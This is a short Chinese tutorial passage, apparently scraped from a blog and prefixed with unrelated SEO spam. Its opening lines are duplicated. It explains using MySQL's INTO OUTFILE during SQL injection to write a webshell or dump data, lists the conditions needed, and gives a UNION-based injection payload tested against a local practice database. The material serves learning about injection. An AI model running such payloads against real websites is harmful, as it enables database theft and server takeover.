有口碑的常州网站优化,苏州园区已经烂掉了,找事做网站,进一步优化一、INTO OUTFILE 函数语法#xff1a;
SELECT column1, column2,
INTO OUTFILE file_path
FROM your_table
WHERE your_conditions;
使用此方式在SQL注入的过程中可以#xff1a; 1、上传shell得到数据库的后端的操作权限 2、爆出数据库的信息 二、使用该函数的条件#…一、INTO OUTFILE 函数语法
SELECT column1, column2,
INTO OUTFILE file_path
FROM your_table
WHERE your_conditions;
使用此方式在SQL注入的过程中可以 1、上传shell得到数据库的后端的操作权限 2、爆出数据库的信息 二、使用该函数的条件 1、mysql操作者需要root权限 2、mysql的my.ini文件中的secure_file_priv参数值需要为空默认为NULL注意NULL不是空 3、需要知道网站的物理路径 三、参考例子
?id-1)) union select 1,2,group_concat(table_name)
into outfile D:/桌面desktop/abcd.txt
from information_schema.tables
where table_schemasecurity-- 这里是通过into outfile函数将表名导出到我的桌面毕竟是模拟所以服务器就是我的电脑所以也就相当于网站的物理路径了
